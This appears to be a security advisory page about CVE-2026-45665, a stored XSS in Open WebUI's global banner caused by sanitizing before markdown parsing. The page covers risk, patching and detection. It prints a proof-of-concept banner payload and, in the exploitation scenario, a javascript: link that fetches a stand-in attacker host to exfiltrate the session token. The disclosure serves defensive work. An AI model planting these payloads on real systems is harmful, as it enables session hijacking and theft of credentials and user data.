AI Threat Alert

CVE-2026-45665: open-webui: Stored XSS enables Super Admin session hijack

GHSA-cqp4-qqvg-3787 HIGH
Published May 14, 2026
CISO Take

Open WebUI contains a stored XSS vulnerability in its global banner component caused by an inverted sanitization pipeline — DOMPurify runs before marked.js converts markdown to HTML, allowing any `javascript:` URL embedded in markdown link syntax to survive sanitization and execute in every user's browser. The critical concern here is privilege escalation: a single compromised admin account, which is a realistic threat given password reuse and phishing in shared AI platform environments, is sufficient to plant a persistent payload that silently targets the Super Admin on every dashboard load. With a trivially simple one-line PoC requiring no special tools and 91 prior CVEs in this package signaling a historically vulnerable codebase, exploitation probability is high for organizations running Open WebUI as a shared local-LLM frontend. Immediately upgrade to v0.8.0, audit existing banner configurations for suspicious markdown link patterns, and rotate Super Admin session tokens if any banner content cannot be fully accounted for.

Sources: GitHub Advisory NVD ATLAS

What is the risk?

High-severity (CVSS 8.1, scope Change). While High privileges are required to inject the payload, the attack chains a low-bar initial access (one compromised admin) into a full Super Admin session takeover — effectively bypassing MFA because the stolen token represents an already-authenticated session. Open WebUI is widely deployed as a self-hosted AI chat frontend, often with minimal hardening and shared admin credentials. The Changed scope rating reflects that the attacker pivots from a limited admin account to the highest privilege tier on the platform. No CISA KEV listing and no public exploit kit yet, but the PoC is trivial and publicly disclosed in the security advisory.

Attack Kill Chain

Initial Access
Attacker obtains credentials for a limited admin account via phishing or credential stuffing, gaining authenticated access to Open WebUI's admin panel.
AML.T0012
Payload Injection
Attacker navigates to Settings > Banners and saves a markdown-formatted banner containing a `javascript:` URI link, which bypasses DOMPurify because sanitization runs before markdown-to-HTML conversion.
AML.T0049
User Execution
Super Admin loads the dashboard, sees the socially-engineered banner notification, and clicks the disguised malicious link, triggering JavaScript execution in their authenticated session context.
AML.T0011.003
Credential Theft & Privilege Escalation
Executed JavaScript reads the Super Admin's session token from localStorage and exfiltrates it to an attacker-controlled endpoint, granting full platform control without triggering MFA.
AML.T0091.000

What systems are affected?

Package Ecosystem Vulnerable Range Patched
open-webui npm <= 0.7.2 0.8.0
136.3K Pushed 5d ago 75% patched ~4d to patch Full package profile →

Do you use open-webui? You're affected.

Severity & Risk

CVSS 3.1
8.1 / 10
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Trivial

Attack Surface

AV AC PR UI S C I A
AV Network
AC Low
PR High
UI Required
S Changed
C High
I High
A None

What should I do?

6 steps

  1. Patch immediately: upgrade to open-webui >= 0.8.0, which applies DOMPurify after marked.parse(), closing the sanitization gap.

  2. Audit all existing banners: navigate to Settings > Interface > UI > Banners and inspect all content for markdown links containing javascript:, data:, or other URI schemes. Delete any suspicious entries.

  3. Rotate Super Admin credentials and session tokens: if you cannot confirm banner integrity, treat Super Admin sessions as potentially compromised and force re-authentication.

  4. Restrict banner edit permissions: limit which admin accounts can modify global banners; apply principle of least privilege.

  5. Detection: review application logs for banner modification events (POST /api/config or equivalent) and correlate with admin accounts that were recently created, had password changes, or show anomalous login patterns.

  6. If CSP is deployed upstream (e.g., via reverse proxy), verify that script-src does not permit inline execution — this would have partially mitigated the javascript: href execution in some browser configurations.

Classification

Auth Bypass Social Engineering Data Extraction API Framework AML.T0011.003 AML.T0012 AML.T0049 AML.T0055 AML.T0091.000

Compliance Impact

This CVE is relevant to:

EU AI Act
Art. 9 - Risk Management System
ISO 42001
A.6.2 - AI System Risk Management — Information Security Controls
NIST AI RMF
MANAGE 2.2 - Mechanisms are in place and applied to sustain the value of AI systems over time
OWASP LLM Top 10
LLM05 - Improper Output Handling

Frequently Asked Questions

What is CVE-2026-45665?

Open WebUI contains a stored XSS vulnerability in its global banner component caused by an inverted sanitization pipeline — DOMPurify runs before marked.js converts markdown to HTML, allowing any `javascript:` URL embedded in markdown link syntax to survive sanitization and execute in every user's browser. The critical concern here is privilege escalation: a single compromised admin account, which is a realistic threat given password reuse and phishing in shared AI platform environments, is sufficient to plant a persistent payload that silently targets the Super Admin on every dashboard load. With a trivially simple one-line PoC requiring no special tools and 91 prior CVEs in this package signaling a historically vulnerable codebase, exploitation probability is high for organizations running Open WebUI as a shared local-LLM frontend. Immediately upgrade to v0.8.0, audit existing banner configurations for suspicious markdown link patterns, and rotate Super Admin session tokens if any banner content cannot be fully accounted for.

Is CVE-2026-45665 actively exploited?

No confirmed active exploitation of CVE-2026-45665 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-45665?

1. Patch immediately: upgrade to open-webui >= 0.8.0, which applies DOMPurify after marked.parse(), closing the sanitization gap. 2. Audit all existing banners: navigate to Settings > Interface > UI > Banners and inspect all content for markdown links containing `javascript:`, `data:`, or other URI schemes. Delete any suspicious entries. 3. Rotate Super Admin credentials and session tokens: if you cannot confirm banner integrity, treat Super Admin sessions as potentially compromised and force re-authentication. 4. Restrict banner edit permissions: limit which admin accounts can modify global banners; apply principle of least privilege. 5. Detection: review application logs for banner modification events (`POST /api/config` or equivalent) and correlate with admin accounts that were recently created, had password changes, or show anomalous login patterns. 6. If CSP is deployed upstream (e.g., via reverse proxy), verify that `script-src` does not permit inline execution — this would have partially mitigated the `javascript:` href execution in some browser configurations.

What systems are affected by CVE-2026-45665?

This vulnerability affects the following AI/ML architecture patterns: AI chat interfaces, local LLM deployments, multi-user AI platforms, model serving frontends.

What is the CVSS score for CVE-2026-45665?

CVE-2026-45665 has a CVSS v3.1 base score of 8.1 (HIGH).

Technical Details

NVD Description

### Summary A Stored Cross-Site Scripting (XSS) vulnerability exists in the Banner component due to an improper sanitization order (specifically, DOMPurify is executed before the marked library). This vulnerability allows a compromised or malicious administrator to plant a malicious payload in the global banner. Crucially, this vector enables Privilege Escalation, as the malicious banner is rendered for all users, including the Super Admin (Primary Admin). Consequently, the payload successfully bypasses the existing security mechanism. An attacker can leverage this to steal the Super Admin's session token ### Details Root Cause: The code attempts to sanitize the input using DOMPurify.sanitize() before parsing it with marked.parse(). DOMPurify cleans the raw input. Since [Link](javascript:alert(javascript:alert(localStorage.token))) is valid text (not HTML), it passes through DOMPurify unchanged. marked handles the text and converts it into a clickable HTML link: <a href="javascript:alert(javascript:alert(localStorage.token))">Link</a>. This resulting unsafe HTML is rendered directly via {@html ...} without further checks. `src/lib/components/common/Banner.svelte` (Line 103) ```svelte {@html marked.parse(DOMPurify.sanitize((banner?.content ?? '').replace(/\n/g, '<br>')))} ``` ### POC 1. **Attacker Action:** Log in as a compromised Admin account and navigate to **Settings > Interface > UI > Banners**. 2. **Injection:** Add a new banner and enter the following payload in the content field. This payload creates a link that alerts the user's session token when clicked. ```markdown [Click for Security Update](javascript:alert(localStorage.token)) ``` 3. **Execution:** Click **Save**. The malicious banner is now stored and active. 4. **Victim Action (Privilege Escalation):** The **Primary Admin** logs in and sees the banner on the main dashboard. Believing it to be a system notification, they click the link. **Victim Dashboard View:** <img width="880" height="245" alt="image" src="https://github.com/user-attachments/assets/b70d7f65-ab34-4634-9e78-2a8a7eda1439" /> 5. **Result:** The JavaScript executes immediately within the Primary Admin's session, exposing their full-access token. ### Impact Extend permissions and damage to the entire system. You need administrator privileges to create banners, but this vulnerability is important because it can attack primary administrators and other administrators. Destination: Other Administrators /Primary Administrators. Attack Vector: Corrupting all administrator accounts (even those with limited scope if future granular privileges exist or simply credentials are compromised) could allow an attacker to set traps for the default administrator. The result: Unlike self-XSS or simple administrator configuration changes, this allows you to capture active sessions for the most privileged users and bypass authentication controls such as MFA (because the session is already active). ### Recommended Patch Modify `src/lib/components/common/Banner.svelte` (Line 103): ``` {@html DOMPurify.sanitize(marked.parse((banner?.content ?? '').replace(/\n/g, '<br>')))} ``` ## Resolution Fixed in **v0.8.0**. [`src/lib/components/common/Banner.svelte:103`](https://github.com/open-webui/open-webui/blob/main/src/lib/components/common/Banner.svelte#L103) now applies the sanitization in the correct order: `DOMPurify.sanitize(marked.parse(...))`. `marked.parse` runs first and converts `[text](javascript:...)` markdown into the corresponding HTML link element; `DOMPurify.sanitize` then strips the `javascript:` URL and any other dangerous attributes/elements before the result reaches `{@html ...}`. Users on `>= 0.8.0` are not affected.

Exploitation Scenario

An adversary targets an organization using Open WebUI as their internal AI assistant platform. Through a phishing campaign against a lower-privileged admin, the attacker obtains credentials for an account with banner management rights. The attacker authenticates, navigates to banner settings, and creates a banner reading `[Security Notice — Action Required](javascript:fetch('https://attacker.io/collect?t='+localStorage.token))` with a plausible subject line designed to invite clicks. The banner is saved and immediately rendered across the entire platform. When the Super Admin next logs in and sees what appears to be an urgent system notice, they click the link. The malicious JavaScript executes in their authenticated browser context, exfiltrating their session token to the attacker's server. The attacker replays the token to authenticate as Super Admin, gaining access to all model API keys, user data, and system configuration — all without triggering MFA since the session was already established.

Weaknesses (CWE)

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Primary

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N

References

Timeline

Published
May 14, 2026
Last Modified
May 14, 2026
First Seen
May 15, 2026

Related Vulnerabilities

CRITICAL CVE-2026-44551 9.1

open-webui: LDAP auth bypass — full account takeover

Same package: open-webui
HIGH CVE-2026-45672 8.8

open-webui: code exec gate bypass via API endpoint

Same package: open-webui
HIGH CVE-2025-64495 8.7

Open WebUI: XSS-to-RCE via malicious prompt injection

Same package: open-webui
HIGH CVE-2026-44552 8.7

open-webui: Redis cache poisoning enables cross-instance tool hijack

Same package: open-webui
HIGH CVE-2026-45315 8.7

Analysis pending

Same package: open-webui
Back to Threat Feed